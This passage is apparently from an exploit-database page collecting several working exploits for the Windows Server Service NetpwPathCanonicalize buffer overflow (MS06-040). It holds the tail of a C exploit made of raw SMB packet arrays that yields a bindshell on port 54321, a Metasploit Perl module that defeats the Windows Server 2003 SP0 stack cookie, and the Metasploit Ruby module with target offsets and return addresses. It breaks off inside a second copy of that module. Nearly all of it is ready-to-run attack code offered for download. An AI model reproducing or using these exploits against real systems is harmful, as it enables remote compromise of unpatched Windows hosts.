0xd5, 0xa6, 0x56, 0xdd, 0x91, 0x2c, 0xc5, 0x53, 
0xa6, 0x35, 0xa1, 0x87, 0xc9, 0x2c, 0xc1, 0x91, 
0x62, 0x19, 0xa1, 0xd9, 0x07, 0x1c, 0xea, 0x41, 
0x45, 0xa9, 0xea, 0xac, 0xee, 0xec, 0xe0, 0xd5, 
0xe8, 0xef, 0xc1, 0x2c, 0xd2, 0x79, 0x0e, 0xf0, 
0x9c, 0xc8, 0xa1, 0x87, 0xcd, 0x2c, 0xc1, 0xbe, 
0x62, 0x21, 0x61, 0x53, 0xb6, 0x31, 0x2b, 0x33, 
0xea, 0x01, 0xa1, 0x51, 0x85, 0x09, 0x36, 0xb9, 
0x2a, 0x1c, 0xf1, 0xbc, 0x62, 0x6e, 0x1a, 0x53, 
0xa9, 0x21, 0xa1, 0xa8, 0xf5, 0x80, 0xa1, 0x98, 
0xe1, 0x73, 0x42, 0x56, 0xa7, 0x23, 0xc6, 0x88, 
0x16, 0xfb, 0x4c, 0x8b, 0x8f, 0x45, 0x19, 0xea, 
0x81, 0x5a, 0x59, 0xea, 0xb6, 0x79, 0xd5, 0x08, 
0x81, 0xe6, 0xc7, 0x24, 0xd2, 0x7d, 0xd5, 0x0e, 
0xb6, 0xa4, 0xcf, 0xbe, 0x68, 0xc0, 0x22, 0xda, 
0xbc, 0x47, 0x28, 0x27, 0x39, 0x45, 0xf3, 0xd1, 
0x1c, 0x80, 0x7d, 0x27, 0x3f, 0x7e, 0x79, 0x8b, 
0xba, 0x7e, 0x69, 0x8b, 0xaa, 0x7e, 0xd5, 0x08, 
0x8f, 0x45, 0xfe, 0xe9, 0x8f, 0x7e, 0xa3, 0x39, 
0x7c, 0x45, 0x8e };

char peer0_12[] = {
0x00, 0x00, 0x01, 0x57, 0xff, 0x53, 0x4d, 0x42, 
0x2f, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, 
0x00, 0x08, 0x84, 0xec, 0x0e, 0xff, 0x00, 0x00, 
0x00, 0x00, 0x40, 0x18, 0x01, 0x00, 0x00, 0xff, 
0xff, 0xff, 0xff, 0x08, 0x00, 0x18, 0x01, 0x00, 
0x00, 0x18, 0x01, 0x3f, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x18, 0x01, 0x05, 0x00, 0x00, 0x00, 0x10, 
0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 
0x00, 0x1f, 0x00, 0xc2, 0x99, 0xea, 0x7d, 0x27, 
0x3f, 0x47, 0x3a, 0x89, 0xbc, 0xd2, 0xfa, 0xb0, 
0x4d, 0x80, 0x04, 0x31, 0xbe, 0xd2, 0xfc, 0x8b, 
0xbc, 0xd2, 0xfa, 0xb0, 0x0c, 0x64, 0xac, 0x91, 
0xbe, 0xd2, 0xfc, 0x88, 0xbd, 0x79, 0x7f, 0x27, 
0x39, 0xbe, 0x42, 0x3f, 0x90, 0xeb, 0x53, 0x8f, 
0x16, 0xfb, 0x7f, 0x27, 0x39, 0x4b, 0x40, 0xbc, 
0x8f, 0x45, 0x49, 0xb5, 0x60, 0xc8, 0x40, 0x88, 
0xb0, 0x04, 0xe6, 0x51, 0x0e, 0x47, 0x6e, 0x51, 
0x0b, 0x1c, 0xea, 0x2b, 0x43, 0xd3, 0x68, 0xf5, 
0x17, 0x6f, 0x06, 0x4b, 0x64, 0x57, 0x12, 0x73, 
0x42, 0x86, 0x42, 0xaa, 0x17, 0x9e, 0x3c, 0x27, 
0x9c, 0x69, 0xd5, 0x0e, 0xb2, 0x7a, 0x78, 0x89, 
0xb8, 0x7c, 0x40, 0xd9, 0xb8, 0x7c, 0x7f, 0x89, 
0x16, 0xfd, 0x42, 0x75, 0x30, 0x28, 0xe4, 0x8b, 
0x16, 0xfb, 0x40, 0x27, 0x16, 0x1a, 0xd5, 0x08, 
0x62, 0x7a, 0xd6, 0x5b, 0x2d, 0x49, 0xd5, 0x0e, 
0xbb, 0xd2, 0xfa, 0xb0, 0x06, 0xe3, 0xca, 0xb8, 
0xba, 0xd2, 0xfc, 0x27, 0x39, 0x61, 0x72, 0x5a, 
0x34, 0x54, 0x46, 0x4c, 0x45, 0x44, 0x38, 0x4f, 
0x6a, 0x44, 0x33, 0x41, 0x49, 0x43, 0x49, 0x53, 
0x52, 0x37, 0x41, 0x31, 0x34, 0x67, 0x66, 0x70, 
0x41, 0x47, 0x41, 0x49, 0x34, 0x4d, 0x76, 0x75, 
0x62, 0x31, 0x79, 0x57, 0x54, 0x64, 0x54, 0x5a, 
0x6f, 0x45, 0x6e, 0x47, 0x71, 0x67, 0x52, 0x31, 
0x66, 0x45, 0x5a, 0x6d, 0x41, 0x71, 0x39, 0x4c, 
0x4c, 0x7a, 0x48, 0x6f, 0x50, 0x74, 0x4c, 0x47, 
0x61, 0x6a, 0x30, 0x55, 0x69, 0x68, 0x7a, 0x7a, 
0x6b, 0x69, 0x33, 0x4c, 0x70, 0x34, 0x47, 0x53, 
0x4a, 0x54, 0x74, 0x39, 0x58, 0x33, 0x78, 0x43, 
0x67, 0x54, 0x74, 0x58, 0x77, 0x32, 0x77, 0x42, 
0x52, 0x4d, 0x57, 0x70, 0x36, 0x75, 0x38, 0x33, 
0x52, 0x66, 0x79 };

char peer0_13[] = {
0x00, 0x00, 0x01, 0x57, 0xff, 0x53, 0x4d, 0x42, 
0x2f, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, 
0x00, 0x08, 0x84, 0xec, 0x0e, 0xff, 0x00, 0x00, 
0x00, 0x00, 0x40, 0x30, 0x02, 0x00, 0x00, 0xff, 
0xff, 0xff, 0xff, 0x08, 0x00, 0x18, 0x01, 0x00, 
0x00, 0x18, 0x01, 0x3f, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x18, 0x01, 0x05, 0x00, 0x00, 0x00, 0x10, 
0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 
0x00, 0x1f, 0x00, 0x52, 0x36, 0x36, 0x37, 0x4e, 
0x54, 0x6f, 0x48, 0x76, 0x51, 0x32, 0x63, 0x68, 
0x67, 0x36, 0x68, 0x43, 0x39, 0x54, 0x46, 0x4b, 
0x67, 0x79, 0x56, 0x57, 0x53, 0x45, 0x39, 0x42, 
0x4a, 0x65, 0x4f, 0x57, 0x73, 0x42, 0x6b, 0x39, 
0x52, 0x76, 0x31, 0x56, 0x42, 0x6e, 0x42, 0x70, 
0x75, 0x42, 0x46, 0x58, 0x35, 0x48, 0x46, 0x62, 
0x4a, 0x78, 0x6d, 0x33, 0x53, 0x50, 0x34, 0x30, 
0x7a, 0x76, 0x46, 0x6c, 0x4f, 0x54, 0x37, 0x6a, 
0x4a, 0x45, 0x59, 0x54, 0x6f, 0x69, 0x62, 0x36, 
0x65, 0x57, 0x6a, 0x32, 0x44, 0x63, 0x31, 0x65, 
0x4b, 0x36, 0x59, 0x55, 0x33, 0x32, 0x38, 0x78, 
0x5a, 0x64, 0x42, 0x75, 0x56, 0x79, 0x52, 0x70, 
0x36, 0x33, 0x47, 0x45, 0x7a, 0x31, 0x72, 0x36, 
0x51, 0x50, 0x35, 0x70, 0x4f, 0x58, 0x59, 0x31, 
0x75, 0x32, 0x39, 0x70, 0x74, 0x50, 0x41, 0x6a, 
0x34, 0x65, 0x7a, 0x78, 0x69, 0x50, 0x59, 0x0a, 
0x08, 0x02, 0x00, 0x4a, 0x52, 0x57, 0x6c, 0x39, 
0x50, 0x77, 0x38, 0x04, 0x08, 0x02, 0x00, 0x32, 
0x37, 0x49, 0x49, 0x56, 0x6d, 0x6f, 0x55, 0x68, 
0x56, 0x69, 0x51, 0x41, 0x35, 0x43, 0x4c, 0x47, 
0x6b, 0x4f, 0x45, 0x30, 0x51, 0x36, 0x52, 0x30, 
0x6f, 0x64, 0x74, 0x78, 0x65, 0x32, 0x70, 0x04, 
0x08, 0x02, 0x00, 0x35, 0x79, 0x78, 0x32, 0x78, 
0x70, 0x38, 0x35, 0x04, 0x08, 0x02, 0x00, 0x51, 
0x67, 0x39, 0x36, 0x4a, 0x71, 0x65, 0x72, 0x56, 
0x55, 0x47, 0x58, 0x53, 0x58, 0x59, 0x4f, 0x61, 
0x61, 0x7a, 0x47, 0x62, 0x48, 0x56, 0x61, 0x73, 
0x33, 0x4d, 0x4b, 0x34, 0x42, 0x39, 0x79, 0x00, 
0x00, 0xbf, 0xf9, 0x78, 0x00, 0x00, 0x00, 0x01, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 
0x00, 0x00, 0x00, 0x00, 0x00, 0xb4, 0xee, 0x7b, 
0x00, 0x00, 0x00 };

char peer0_14[] = {
0x00, 0x00, 0x00, 0x66, 0xff, 0x53, 0x4d, 0x42, 
0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, 
0x00, 0x08, 0x84, 0xec, 0x10, 0x00, 0x00, 0x1c, 
0x00, 0x00, 0x04, 0xe0, 0xff, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x4a, 0x00, 0x1c, 0x00, 0x4a, 0x00, 0x02, 
0x00, 0x26, 0x00, 0x00, 0x40, 0x23, 0x00, 0x5c, 
0x50, 0x49, 0x50, 0x45, 0x5c, 0x00, 0x05, 0x00, 
0x00, 0x02, 0x10, 0x00, 0x00, 0x00, 0x1c, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x1f, 0x00, 0x00, 0x00, 
0x00, 0x00 };


int main(int argc,char **argv)
{

int fd;
int con;
int repbf[20000];

struct sockaddr_in target;


if(argc < 2)
{

printf("Microsoft Windows CanonicalizePathName() Remote Exploit (MS06-040)\n");
printf("Tested on WindowsXP SP1 EN and got a bindshell on port 54321\n");
printf("Win2k should give a crash in services.exe\n");
printf("I've used the default smbdomain: WORKGROUP\n\n");
printf("Usage: %s <ip>\n",argv[0]);
printf("Example: %s 192.168.1.103\n\n",argv[0]);
printf("Written by: Preddy\n");
printf("RootShell Security Group\n");
printf("www.team-rootshell.com\n");

exit(1);

}

fd = socket(AF_INET,SOCK_STREAM,0);

if(fd < 0)
{

perror("Could not create socket\n");
exit(1);
}

printf("Target: %s\n",argv[1]);

target.sin_family = AF_INET;
target.sin_addr.s_addr = inet_addr(argv[1]);
target.sin_port = htons(PORT);

con = connect(fd,(struct sockaddr_in *)&target,sizeof(target));

if(con < 0)
{

printf("Could not connect\n");
exit(1);
}

sendto(fd,peer0_0,sizeof(peer0_0),0,&target,sizeof(target));
read(fd,repbf,sizeof(repbf));
sendto(fd,peer0_1,sizeof(peer0_1),0,&target,sizeof(target));
read(fd,repbf,sizeof(repbf));
sendto(fd,peer0_2,sizeof(peer0_2),0,&target,sizeof(target));
read(fd,repbf,sizeof(repbf));
sendto(fd,peer0_3,sizeof(peer0_3),0,&target,sizeof(target));
read(fd,repbf,sizeof(repbf));
sendto(fd,peer0_4,sizeof(peer0_4),0,&target,sizeof(target));
read(fd,repbf,sizeof(repbf));
sendto(fd,peer0_5,sizeof(peer0_5),0,&target,sizeof(target));
read(fd,repbf,sizeof(repbf));
sendto(fd,peer0_6,sizeof(peer0_6),0,&target,sizeof(target));
read(fd,repbf,sizeof(repbf));
sendto(fd,peer0_7,sizeof(peer0_7),0,&target,sizeof(target));
read(fd,repbf,sizeof(repbf));
sendto(fd,peer0_8,sizeof(peer0_8),0,&target,sizeof(target));
read(fd,repbf,sizeof(repbf));
sendto(fd,peer0_9,sizeof(peer0_9),0,&target,sizeof(target));
read(fd,repbf,sizeof(repbf));
sendto(fd,peer0_10,sizeof(peer0_10),0,&target,sizeof(target));
read(fd,repbf,sizeof(repbf));
sendto(fd,peer0_11,sizeof(peer0_11),0,&target,sizeof(target));
read(fd,repbf,sizeof(repbf));
sendto(fd,peer0_12,sizeof(peer0_12),0,&target,sizeof(target));
read(fd,repbf,sizeof(repbf));
sendto(fd,peer0_13,sizeof(peer0_13),0,&target,sizeof(target));
read(fd,repbf,sizeof(repbf));
sendto(fd,peer0_14,sizeof(peer0_14),0,&target,sizeof(target));

printf("Attack Finished: now open a new terminal and nc to your victim on port 54321\n");
printf("Warning: Don't close this window!\n");

read(fd,repbf,sizeof(repbf));

printf("Done..\n");

close(fd);

}

// milw0rm.com [2006-08-19]
		

- 漏洞信息 (2355)

MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040) (2k3) (EDBID:2355)
windows remote
2006-09-13 Verified
445 Trirat Puttaraksa
N/A [点击下载]
#########################################################################
# netapi_win2003.pm (MS06-040 Exploit for Windows Server 2003 SP0)
#
# Author: Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>
#
# http://sf-freedom.blogspot.com
# 
# For educational purpose only
#
# Note: This exploit is developed because of my question "Is it exploitable
# on Windows Server 2003 platform ?". As I know, Windows XP SP2 and Windows
# Server 2003 SP1 is not exploitable because they are compiled with /GS, but
# how about Windows Server 2003 SP0 ? In metasploit netapi_ms06_040.pm there
# is no Windows Server 2003 sp0 target, this means 2003 SP0 is not 
# exploitable ? There is Stack Protection Windows Server 2003, is this the
# reasons why there is no Windows Server 2003 SP0 exploit for MS06-040 ?
#
# I start to modify H D Moore's exploit (netapi_ms06_040.pm - credits to him
# ^-^) and work on it. The problem is the Stack Protection "security cookie 
# checking". Because wcscpy() method allow me to write to any memory location
# that are marked writable, I decide to write to the location at "security
# cookie" is stored and it works !!! I will describe more implementation details
# in my blog in few days ^-^ 
#
# This exploit tested on Windows Server 2003 SP0 build 3790 and successful 
# exploit 2003 machine in my environment - all patch before MS06-040 
# (KB921883). It's quite reliable but not 100%. There is the possibility that
# the exploit will fail and the target system process crash. Because I have 
# only one testbase system, I couldn't confirm this exploit will work on 
# your environment. However feel free to e-mail to me.
#
# Credits: H D Moore
#########################################################################

package Msf::Exploit::netapi_win2003;
use base "Msf::Exploit";
use strict;

use Pex::DCERPC;
use Pex::NDR;

my $advanced = {
	'FragSize'    => [ 256, 'The DCERPC fragment size' ],
	'BindEvasion' => [ 0,   'IDS Evasion of the bind request' ],
	'DirectSMB'   => [ 0,   'Use direct SMB (445/tcp)' ],
  };

my $info = {
	'Name'    => 'MSO6-040 Windows Server 2003 Target',
	'Version' => '',
	'Authors' =>
	  [
		'Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>',
	  ],

	'Arch' => ['x86'],
	'OS'   => [ 'win32', 'win2003' ],
	'Priv' => 1,

	'AutoOpts' => { 'EXITFUNC' => 'thread' },
	
	'UserOpts' =>
	  {
		'RHOST' => [ 1, 'ADDR', 'The target address' ],

		# SMB connection options
		'SMBUSER' => [ 0, 'DATA', 'The SMB username to connect with', '' ],
		'SMBPASS' => [ 0, 'DATA', 'The password for specified SMB username', '' ],
		'SMBDOM'  => [ 0, 'DATA', 'The domain for specified SMB username', '' ],
	  },

	'Payload' =>
	  {
	  	# Technically we can use more space than this, but by limiting it
		# to 370 bytes we can use the same request for all Windows SPs.
		'Space'    => 370,
		
		'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
		'Keys'     => ['+ws2ord'],

		# sub esp, 4097 + inc esp makes stack happy
		'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
	  },

	'Description' => Pex::Text::Freeform(
		qq{
		This exploit modified from netapi_ms06_040.pm (Metasploit).
		While netapi_ms06_040 of metasploit works on Windows 2000 
		SP0 - SP4 and Windows XP SP0 - SP1, this exploit works on
		Windows Server 2003 SP0.
	  }
	  ),

	'Refs' =>
	  [
		[ 'BID', '19409' ],
		[ 'CVE', '2006-3439' ],
		[ 'MSB', 'MS06-040' ],
	  ],

	'DefaultTarget' => 0,
	'Targets'       =>
	  [
		[ '(wcscpy) Windows Server 2003 SP0', 612],
	  ],

	'Keys' => ['srvsvc'],

	'DisclosureDate' => '',
  };

sub new {
	my ($class) = @_;
	my $self =
	  $class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced }, @_ );
	return ($self);
}

sub Exploit {
	my ($self)      = @_;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $target_idx  = $self->GetVar('TARGET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
	my $target_name = '*SMBSERVER';

	my $FragSize = $self->GetVar('FragSize') || 256;
	my $target   = $self->Targets->[$target_idx];

	if (!$self->InitNops(128)) {
		$self->PrintLine("Could not initialize the nop module");
		return;
	}

	my ( $res, $rpc );

	my $pipe    = '\BROWSER';
	my $uuid    = '4b324fc8-1670-01d3-1278-5a47bf6ee188';
	my $version = '3.0';

	my $handle = Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host, $pipe );

	my $dce = Pex::DCERPC->new(
		'handle'      => $handle,
		'username'    => $self->GetVar('SMBUSER'),
		'password'    => $self->GetVar('SMBPASS'),
		'domain'      => $self->GetVar('SMBDOM'),
		'fragsize'    => $self->GetVar('FragSize'),
		'bindevasion' => $self->GetVar('BindEvasion'),
		'directsmb'   => $self->GetVar('DirectSMB'),
	  );

	if ( !$dce ) {
		$self->PrintLine("[*] Could not bind to $handle");
		return;
	}

	my $smb = $dce->{'_handles'}{$handle}{'connection'};
	
	if (! $smb) {
		$self->PrintLine("[*] Could not establish SMB session");
		return;
	}

	my $stub;

	#
	# Use the wcscpy() method on Windows Server 2003 SP0
	#	
	if ($target->[0] =~ /2003/) {

		my $path = 	
			$shellcode.

			# Padding
			Pex::Text::AlphaNumText($target->[1] - length($shellcode)).
			Pex::Text::AlphaNumText(32).
			substr($shellcode, 0, 4).	# cookie
			Pex::Text::AlphaNumText(4).
			# return address == address that store security cookie
			("\xec\xc1\xc8\x71") . 
			Pex::Text::AlphaNumText(8).

			("\xec\xc1\xc8\x71" x 2) .
			Pex::Text::AlphaNumText(36).

			# Terminate
			"\x00\x00";


		# Package that into a stub
		$stub =
			Pex::NDR::Long(int(rand(0xffffffff))).
			Pex::NDR::UnicodeConformantVaryingString('').
			Pex::NDR::UnicodeConformantVaryingStringPreBuilt($path).
			Pex::NDR::Long(int(rand(250)+1)).
			Pex::NDR::UnicodeConformantVaryingString('').
			Pex::NDR::Long(int(rand(250)+1)).
			Pex::NDR::Long(0);
	}
	else {
		$self->PrintLine("This target is not currently supported");
		return;
	}


	$self->PrintLine("[*] Sending request...");
	
	# Function 0x1f is not the only way to exploit this :-)
	my @response = $dce->request( $handle, 0x1f, $stub );
	
	if ( length($dce->{'response'}->{'StubData'}) > 0) {
		$self->PrintLine("[*] The server rejected it, trying again...");
		@response = $dce->request( $handle, 0x1f, $stub );
	}
	
	if ( length($dce->{'response'}->{'StubData'}) > 0) {
		$self->PrintLine("[*] Exploit Failed");
	}
	
	if (@response) {
		$self->PrintLine('[*] RPC server responded with:');
		foreach my $line (@response) {
			$self->PrintLine( '[*] ' . $line );
		}
	}

	return;
}

1;

# milw0rm.com [2006-09-13]
		

- 漏洞信息 (16367)

Microsoft Server Service NetpwPathCanonicalize Overflow (EDBID:16367)
windows remote
2011-02-17 Verified
0 metasploit
N/A [点击下载]
##
# $Id: ms06_040_netapi.rb 11762 2011-02-17 03:56:15Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::DCERPC
	include Msf::Exploit::Remote::SMB

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft Server Service NetpwPathCanonicalize Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the NetApi32 CanonicalizePathName() function
				using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that
				other RPC calls could be used to exploit this service. This exploit will result in
				a denial of service on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt
				will likely result in a complete reboot on Windows 2000 and the termination of all
				SMB-related services on Windows XP. The default target for this exploit should succeed
				on Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0.
			},
			'Author'         =>
				[
					'hdm'
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11762 $',
			'References'     =>
				[
					[ 'CVE', '2006-3439' ],
					[ 'OSVDB', '27845' ],
					[ 'BID', '19409' ],
					[ 'MSB', 'MS06-040' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					# Technically we can use more space than this, but by limiting it
					# to 370 bytes we can use the same request for all Windows SPs.
					'Space'    => 370,
					'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'DefaultTarget'  => 0,
			'Targets'        =>
				[
					[ '(wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)', { } ],
					[ '(wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4',
						{
							'Offset' => 1000,
							'Ret'    => 0x00020804
						}
					],
					[ '(wcscpy) Windows XP SP0/SP1',
						{
							'Offset' => 612,
							'Ret'    => 0x00020804
						}
					],
					[ '(stack)  Windows XP SP1 English',
						{
							'OffsetA' => 656,
							'OffsetB' => 680,
							'Ret'     => 0x71ab1d54 # jmp esp @ ws2_32.dll
						}
					],
					[ '(stack)  Windows XP SP1 Italian',
						{
							'OffsetA' => 656,
							'OffsetB' => 680,
							'Ret'     => 0x71a37bfb # jmp esp @ ws2_32.dll
						}
					],
					[ '(wcscpy) Windows 2003 SP0',
						{
							'Offset' => 612,
							'Ret'    => 0x00020804
						}
					],
				],

			'DisclosureDate' => 'Aug 8 2006'))

		register_options(
			[
				OptString.new('SMBPIPE', [ true,  "The pipe name to use (BROWSER, SRVSVC)", 'BROWSER']),
			], self.class)

	end

	def exploit

		connect()
		smb_login()

		mytarget = target
		if (not target) or (target.name =~ /Automatic/)
			case smb_peer_os()
				when 'Windows 5.0'
					print_status("Detected a Windows 2000 target")
					mytarget = targets[1]

				when 'Windows NT 4.0'
					print_status("Detected a Windows NT 4.0 target")
					mytarget = targets[1]

				when 'Windows 5.1'
					begin
						smb_create("\\SRVSVC")
						print_status("Detected a Windows XP SP0/SP1 target")
					rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
						if (e.error_code == 0xc0000022)
							print_status("Windows XP SP2 is not exploitable")
							return
						end
						print_status("Detected a Windows XP target (unknown patch level)")
					end
					mytarget = targets[2]

				when /Windows Server 2003 (\d+)$/
					print_status("Detected a Windows 2003 SP0 target")
					mytarget = targets[5]

				when /Windows Server 2003 (\d+) Service Pack (\d+)/
					print_status("Windows 2003 SP#{$2} is not exploitable")
					return

				when /Samba/
					print_status("Samba is not vulnerable")
					return

				else
					print_status("No target detected for #{smb_peer_os()}/#{smb_peer_lm()}...")
					return
			end
		end

		# Specific fixups for Windows NT
		case smb_peer_os()
		when 'Windows NT 4.0'
			print_status("Adjusting the SMB/DCERPC parameters for Windows NT")
			datastore['SMB::pipe_write_min_size'] = 2048
			datastore['SMB::pipe_write_max_size'] = 4096
		end

		handle = dcerpc_handle(
			'4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',
			'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
		)

		print_status("Binding to #{handle} ...")
		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")

		#
		#  /* Function 0x1f at 0x767e912c */
		#  long function_1f (
		#    [in] [unique] [string] wchar_t * arg_00,
		#    [in] [string] wchar_t * arg_01,
		#    [out] [size_is(arg_03)] char * arg_02,
		#    [in] [range(0, 64000)] long arg_03,
		#    [in] [string] wchar_t * arg_04,
		#    [in,out] long * arg_05,
		#    [in] long arg_06
		#  );
		#

		print_status("Building the stub data...")
		stub = ''

		case mytarget.name

		# This covers NT 4.0 as well
		when /wcscpy.*Windows 2000/

			code = make_nops(mytarget['Offset'] - payload.encoded.length) + payload.encoded

			path = code + ( [mytarget.ret].pack('V') * 16 ) + "\x00\x00"

			stub =
				NDR.long(rand(0xffffffff)) +
				NDR.UnicodeConformantVaryingString('') +
				NDR.UnicodeConformantVaryingStringPreBuilt(path) +
				NDR.long(rand(250)+1) +
				NDR.UnicodeConformantVaryingStringPreBuilt("\xeb\x02\x00\x00") +
				NDR.long(rand(250)+1) +
				NDR.long(0)

		when /wcscpy.*Windows XP/
			path =
				# Payload goes first
				payload.encoded +

				# Padding
				rand_text_alphanumeric(mytarget['Offset'] - payload.encoded.length) +

				# Land 6 bytes in to bypass garbage (XP SP0)
				[ mytarget.ret + 6 ].pack('V') +

				# Padding
				rand_text_alphanumeric(8) +

				# Address to write our shellcode (XP SP0)
				[ mytarget.ret ].pack('V') +

				# Padding
				rand_text_alphanumeric(32) +

				# Jump straight to shellcode (XP SP1)
				[ mytarget.ret ].pack('V') +

				# Padding
				rand_text_alphanumeric(8) +

				# Address to write our shellcode (XP SP1)
				[ mytarget.ret ].pack('V') +

				# Padding
				rand_text_alphanumeric(32) +

				# Terminate the path
				"\x00\x00"

			stub =
				NDR.long(rand(0xffffffff)) +
				NDR.UnicodeConformantVaryingString('') +
				NDR.UnicodeConformantVaryingStringPreBuilt(path) +
				NDR.long(rand(0xf0)+1) +
				NDR.UnicodeConformantVaryingString('') +
				NDR.long(rand(0xf0)+1) +
				NDR.long(0)


		when /stack/
			buff = rand_text_alphanumeric(800)
			buff[0, payload.encoded.length] = payload.encoded
			buff[ mytarget['OffsetA'], 4 ] = [mytarget.ret].pack('V')
			buff[ mytarget['OffsetB'], 5 ] = "\xe9" + [ (mytarget['OffsetA'] + 5) * -1 ].pack('V')

			path = "\\\x00\\\x00" + buff + "\x00\x00"

			stub =
				NDR.long(rand(0xffffffff)) +
				NDR.UnicodeConformantVaryingString('') +
				NDR.UnicodeConformantVaryingStringPreBuilt(path) +
				NDR.long(rand(0xf0)+1) +
				NDR.UnicodeConformantVaryingString('') +
				NDR.long(rand(0xf0)+1) +
				NDR.long(0)


		when /wcscpy.*Windows 2003/
			path =
				# Payload goes first
				payload.encoded +

				# Padding
				rand_text_alphanumeric(mytarget['Offset'] - payload.encoded.length) +

				# Padding
				rand_text_alphanumeric(32) +

				# The cookie is constant,
				# noticed by Nicolas Pouvesle in Misc #28
				"\x4e\xe6\x40\xbb" +

				# Padding
				rand_text_alphanumeric(4) +

				# Jump straight to shellcode
				[ mytarget.ret ].pack('V') +

				# Padding
				rand_text_alphanumeric(8) +

				# Address to write our shellcode
				[ mytarget.ret ].pack('V') +

				# Padding
				rand_text_alphanumeric(40) +

				# Terminate the path
				"\x00\x00"

			stub =
				NDR.long(rand(0xffffffff)) +
				NDR.UnicodeConformantVaryingString('') +
				NDR.UnicodeConformantVaryingStringPreBuilt(path) +
				NDR.long(rand(0xf0)+1) +
				NDR.UnicodeConformantVaryingString('') +
				NDR.long(rand(0xf0)+1) +
				NDR.long(0)

		end

		print_status("Calling the vulnerable function...")

		begin
			dcerpc.call(0x1f, stub, false)
			dcerpc.call(0x1f, stub, false)
		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
		rescue => e
			if e.to_s !~ /STATUS_PIPE_DISCONNECTED/
				raise e
			end
		end

		# Cleanup
		handler
		disconnect
	end

end
		

- 漏洞信息 (F82940)

Microsoft Server Service NetpwPathCanonicalize Overflow (PacketStormID:F82940)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit,denial of service,overflow
windows,2k,nt,xp
CVE-2006-3439
[点击下载]

This Metasploit module exploits a stack overflow in the NetApi32 CanonicalizePathName() function using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that other RPC calls could be used to exploit this service. This exploit will result in a denial of service on on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt will likely result in a complete reboot on Windows 2000 and the termination of all SMB-related services on Windows XP. The default target for this exploit should succeed on Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::DCERPC
	include Msf::Exploit::Remote::SMB


	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Microsoft Server Service NetpwPathCanonicalize Overflow',
			'Description'    => %q{
        		This module exploits a stack overflow in the NetApi32 CanonicalizePathName() function
				using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that
				other RPC calls could be used to exploit this service. This exploit will result in
				a denial of service on on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt
				will likely result in a complete reboot on Windows 2000 and the termination of all 
				SMB-related services on Windows XP. The default target for this exploit should succeed
				on Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0.
			},
			'Author'         => 
				[
					'hdm'
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
